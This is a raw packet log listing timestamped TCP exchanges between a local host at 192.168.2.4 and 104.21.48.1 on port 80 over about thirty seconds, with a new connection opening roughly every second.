Feb 24, 2025 08:40:34.385605097 CET	80	49756	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.152430058 CET	80	49756	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.152571917 CET	49756	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:35.153179884 CET	80	49756	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.153230906 CET	49756	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:35.157658100 CET	80	49756	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.291909933 CET	49757	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:35.297077894 CET	80	49757	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.297192097 CET	49757	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:35.299200058 CET	49757	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:35.304203987 CET	80	49757	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.304291010 CET	49757	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:35.309386969 CET	80	49757	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.962290049 CET	80	49757	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.962938070 CET	49757	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:35.963165045 CET	80	49757	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:35.963367939 CET	49757	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:35.968019962 CET	80	49757	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.104516983 CET	49758	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.109639883 CET	80	49758	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.109776974 CET	49758	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.111707926 CET	49758	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.116839886 CET	80	49758	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.116918087 CET	49758	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.121897936 CET	80	49758	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.836858034 CET	80	49758	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.837053061 CET	49758	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.837384939 CET	80	49758	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.837455988 CET	49758	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.842169046 CET	80	49758	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.985619068 CET	49759	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.990828991 CET	80	49759	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.990947008 CET	49759	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.992674112 CET	49759	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:36.997649908 CET	80	49759	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:36.997751951 CET	49759	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:37.002789021 CET	80	49759	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:37.738871098 CET	80	49759	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:37.739015102 CET	49759	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:37.739784956 CET	80	49759	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:37.739833117 CET	49759	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:37.744096994 CET	80	49759	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:37.898075104 CET	49760	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:37.903228045 CET	80	49760	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:37.903315067 CET	49760	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:37.906234980 CET	49760	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:37.911226034 CET	80	49760	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:37.911289930 CET	49760	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:37.916299105 CET	80	49760	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:38.704355001 CET	80	49760	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:38.704503059 CET	49760	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:38.705171108 CET	80	49760	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:38.705239058 CET	49760	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:38.709626913 CET	80	49760	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:39.136409998 CET	49761	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:39.141710997 CET	80	49761	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:39.141798019 CET	49761	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:39.150405884 CET	49761	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:39.155400991 CET	80	49761	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:39.155461073 CET	49761	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:39.160435915 CET	80	49761	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:39.867889881 CET	80	49761	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:39.868012905 CET	49761	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:39.869599104 CET	80	49761	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:39.869657040 CET	49761	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:39.873050928 CET	80	49761	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:40.021399021 CET	49762	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:40.034674883 CET	80	49762	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:40.034810066 CET	49762	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:40.038069963 CET	49762	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:40.044644117 CET	80	49762	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:40.047671080 CET	49762	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:40.052755117 CET	80	49762	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:41.836452007 CET	80	49762	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:41.836574078 CET	49762	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:41.838080883 CET	80	49762	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:41.838145018 CET	49762	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:41.841667891 CET	80	49762	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:41.982258081 CET	49763	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:41.987493992 CET	80	49763	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:41.987569094 CET	49763	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:41.989718914 CET	49763	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:41.994884968 CET	80	49763	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:41.994932890 CET	49763	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:41.999948978 CET	80	49763	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:42.803555965 CET	80	49763	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:42.803843021 CET	49763	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:42.804136992 CET	80	49763	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:42.804291010 CET	49763	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:42.808907032 CET	80	49763	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:42.964029074 CET	49764	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:42.969487906 CET	80	49764	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:42.969634056 CET	49764	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:42.972930908 CET	49764	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:42.978115082 CET	80	49764	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:42.978187084 CET	49764	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:42.983339071 CET	80	49764	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:43.783035040 CET	80	49764	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:43.783344030 CET	80	49764	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:43.783479929 CET	49764	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:43.784049034 CET	49764	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:43.789129019 CET	80	49764	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:43.935574055 CET	49765	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:43.940743923 CET	80	49765	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:43.941062927 CET	49765	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:43.943644047 CET	49765	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:43.948688030 CET	80	49765	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:43.948896885 CET	49765	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:43.954071045 CET	80	49765	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:44.708434105 CET	80	49765	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:44.708677053 CET	49765	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:44.708909988 CET	80	49765	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:44.709162951 CET	49765	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:44.713763952 CET	80	49765	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:44.885416985 CET	49766	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:44.890629053 CET	80	49766	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:44.890762091 CET	49766	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:44.893898964 CET	49766	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:44.899112940 CET	80	49766	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:44.899169922 CET	49766	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:44.904380083 CET	80	49766	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:45.615396976 CET	80	49766	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:45.615534067 CET	49766	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:45.615729094 CET	80	49766	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:45.615796089 CET	49766	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:45.620611906 CET	80	49766	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:45.765156031 CET	49767	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:45.770299911 CET	80	49767	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:45.770549059 CET	49767	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:45.773381948 CET	49767	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:45.778758049 CET	80	49767	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:45.778879881 CET	49767	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:45.784569025 CET	80	49767	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:46.551970005 CET	80	49767	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:46.552124023 CET	49767	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:46.553075075 CET	80	49767	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:46.553134918 CET	49767	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:46.558038950 CET	80	49767	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:46.695965052 CET	49768	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:46.701634884 CET	80	49768	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:46.701741934 CET	49768	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:46.704660892 CET	49768	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:46.710716009 CET	80	49768	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:46.710798979 CET	49768	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:46.715863943 CET	80	49768	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:47.489578962 CET	80	49768	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:47.489933968 CET	49768	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:47.490381956 CET	80	49768	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:47.490570068 CET	49768	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:47.495290995 CET	80	49768	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:47.644233942 CET	49769	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:47.649486065 CET	80	49769	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:47.649578094 CET	49769	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:47.652653933 CET	49769	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:47.657777071 CET	80	49769	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:47.657941103 CET	49769	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:47.662950993 CET	80	49769	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:48.380449057 CET	80	49769	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:48.380589008 CET	49769	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:48.381403923 CET	80	49769	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:48.381468058 CET	49769	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:48.385972977 CET	80	49769	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:48.525852919 CET	49770	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:48.530988932 CET	80	49770	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:48.531086922 CET	49770	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:48.533803940 CET	49770	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:48.538875103 CET	80	49770	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:48.538949013 CET	49770	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:48.544004917 CET	80	49770	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:49.167604923 CET	80	49770	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:49.167882919 CET	49770	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:49.168544054 CET	80	49770	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:49.168621063 CET	49770	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:49.173084974 CET	80	49770	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:49.317882061 CET	49771	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:49.323211908 CET	80	49771	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:49.323429108 CET	49771	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:49.326426983 CET	49771	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:49.331511974 CET	80	49771	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:49.331682920 CET	49771	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:49.336909056 CET	80	49771	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.052853107 CET	80	49771	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.053008080 CET	49771	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:50.053056955 CET	80	49771	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.053148031 CET	49771	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:50.058165073 CET	80	49771	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.226341963 CET	49772	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:50.231549025 CET	80	49772	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.231652975 CET	49772	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:50.235701084 CET	49772	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:50.240823984 CET	80	49772	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.240892887 CET	49772	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:50.245934010 CET	80	49772	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.996112108 CET	80	49772	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.996344090 CET	49772	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:50.997019053 CET	80	49772	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:50.997085094 CET	49772	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:51.001957893 CET	80	49772	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:51.157710075 CET	49773	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:51.163033009 CET	80	49773	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:51.163283110 CET	49773	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:51.166151047 CET	49773	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:51.171350956 CET	80	49773	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:51.171451092 CET	49773	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:51.176573038 CET	80	49773	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:52.068084002 CET	80	49773	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:52.068130016 CET	80	49773	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:52.068159103 CET	80	49773	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:52.068550110 CET	49773	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:52.068550110 CET	49773	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:52.073769093 CET	80	49773	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:52.213888884 CET	49774	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:52.219039917 CET	80	49774	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:52.219151020 CET	49774	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:52.221129894 CET	49774	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:52.226171017 CET	80	49774	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:52.226264000 CET	49774	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:52.231359005 CET	80	49774	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:53.012604952 CET	80	49774	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:53.012702942 CET	80	49774	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:53.012908936 CET	49774	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:53.013844013 CET	49774	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:53.018974066 CET	80	49774	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:53.456415892 CET	49775	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:53.461781025 CET	80	49775	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:53.461899996 CET	49775	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:53.496340990 CET	49775	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:53.501581907 CET	80	49775	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:53.501662016 CET	49775	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:53.506794930 CET	80	49775	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:54.257286072 CET	80	49775	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:54.257394075 CET	49775	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:54.257895947 CET	80	49775	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:54.257942915 CET	49775	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:54.265551090 CET	80	49775	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:54.466281891 CET	49776	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:54.475189924 CET	80	49776	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:54.475297928 CET	49776	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:54.478203058 CET	49776	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:54.485987902 CET	80	49776	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:54.486058950 CET	49776	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:54.491931915 CET	80	49776	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:55.234193087 CET	80	49776	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:55.234327078 CET	49776	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:55.234460115 CET	80	49776	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:55.234525919 CET	49776	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:55.239376068 CET	80	49776	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:55.395237923 CET	49777	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:55.400418043 CET	80	49777	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:55.400505066 CET	49777	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:55.403469086 CET	49777	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:55.408679008 CET	80	49777	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:55.408746004 CET	49777	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:55.413897991 CET	80	49777	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:56.181890965 CET	80	49777	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:56.182233095 CET	80	49777	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:56.182540894 CET	49777	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:56.182661057 CET	49777	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:56.187809944 CET	80	49777	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:56.499596119 CET	49778	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:56.506119013 CET	80	49778	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:56.506208897 CET	49778	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:56.508342981 CET	49778	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:56.514383078 CET	80	49778	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:56.514457941 CET	49778	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:56.519588947 CET	80	49778	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:57.247345924 CET	80	49778	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:57.247750998 CET	49778	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:57.248642921 CET	80	49778	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:57.249666929 CET	49778	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:57.252939939 CET	80	49778	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:57.417947054 CET	49779	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:57.423098087 CET	80	49779	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:57.423217058 CET	49779	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:57.426148891 CET	49779	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:57.431293964 CET	80	49779	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:57.431406975 CET	49779	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:57.436568975 CET	80	49779	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:59.173927069 CET	80	49779	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:59.174494028 CET	80	49779	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:59.174518108 CET	49779	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:59.174561024 CET	49779	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:59.179742098 CET	80	49779	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:59.507935047 CET	49780	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:59.513113022 CET	80	49780	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:59.513206005 CET	49780	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:59.516284943 CET	49780	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:59.521409035 CET	80	49780	104.21.48.1	192.168.2.4
Feb 24, 2025 08:40:59.521476984 CET	49780	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:40:59.526576042 CET	80	49780	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:00.308063030 CET	80	49780	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:00.308115005 CET	80	49780	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:00.308231115 CET	49780	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:00.308667898 CET	49780	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:00.314009905 CET	80	49780	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:00.484755039 CET	49781	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:00.490088940 CET	80	49781	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:00.490215063 CET	49781	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:00.493115902 CET	49781	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:00.499128103 CET	80	49781	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:00.499202967 CET	49781	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:00.504897118 CET	80	49781	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:01.267452955 CET	80	49781	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:01.267591000 CET	49781	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:01.267961979 CET	80	49781	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:01.268021107 CET	49781	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:01.272764921 CET	80	49781	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:01.447964907 CET	49782	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:01.453192949 CET	80	49782	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:01.453319073 CET	49782	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:01.465842009 CET	49782	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:01.470930099 CET	80	49782	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:01.471055984 CET	49782	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:01.476191044 CET	80	49782	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:02.224548101 CET	80	49782	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:02.224776030 CET	80	49782	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:02.224843025 CET	49782	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:02.233891964 CET	49782	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:02.239013910 CET	80	49782	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:02.425162077 CET	49783	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:02.430319071 CET	80	49783	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:02.430412054 CET	49783	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:02.433902979 CET	49783	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:02.439204931 CET	80	49783	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:02.439270973 CET	49783	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:02.444341898 CET	80	49783	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:03.173329115 CET	80	49783	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:03.173615932 CET	80	49783	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:03.173832893 CET	49783	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:03.174081087 CET	49783	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:03.179017067 CET	80	49783	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:03.343391895 CET	49784	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:03.348701954 CET	80	49784	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:03.352761030 CET	49784	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:03.355752945 CET	49784	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:03.360765934 CET	80	49784	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:03.364814997 CET	49784	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:03.370040894 CET	80	49784	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:04.134594917 CET	80	49784	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:04.134836912 CET	49784	80	192.168.2.4	104.21.48.1
